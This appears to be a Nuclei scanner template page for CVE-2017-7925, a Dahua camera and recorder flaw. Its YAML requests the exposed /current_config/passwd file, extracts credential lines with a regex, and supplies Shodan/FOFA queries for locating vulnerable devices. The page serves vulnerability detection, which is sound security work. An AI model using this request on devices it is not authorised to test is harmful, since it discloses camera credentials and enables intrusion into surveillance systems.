Skip to content
Nuclei Templates

Dahua Security - Configuration File Disclosure

ID: CVE-2017-7925

Severity: critical

Author: E1A,none

Tags: cve,cve2017,dahua,camera,dahuasecurity

Description

Section titled “Description”

A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2017-7925


info:
  name: Dahua Security - Configuration File Disclosure
  author: E1A,none
  severity: critical
  description: |
    A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.
  remediation: |
    To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7925
    - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02
    - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-7925
    cwe-id: CWE-522,CWE-260
    epss-score: 0.42592
    epss-percentile: 0.97235
    cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: dh-ipc-hdbw23a0rn-zs_firmware
    shodan-query: http.favicon.hash:2019488876
    fofa-query: icon_hash=2019488876
  tags: cve,cve2017,dahua,camera,dahuasecurity


http:
  - method: GET
    path:
      - "{{BaseURL}}/current_config/passwd"


    matchers:
      - type: dsl
        dsl:
          - contains(to_lower(body), "ugm")
          - contains(to_lower(body), "id:name:passwd")
          - status_code == 200
        condition: and


    extractors:
      - type: regex
        group: 1
        regex:
          - 1:(.*:.*):1:CtrPanel
# digest: 4a0a0047304502210097fd66c796e36eb75e23a894a34fcbcf96f743e300845e03bd448038adeec8be022066f2bebeea5feb0934a23209ee7952937d44170aede0d91cba4b3ca7d27a6e5e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-7925.yaml"

View on Github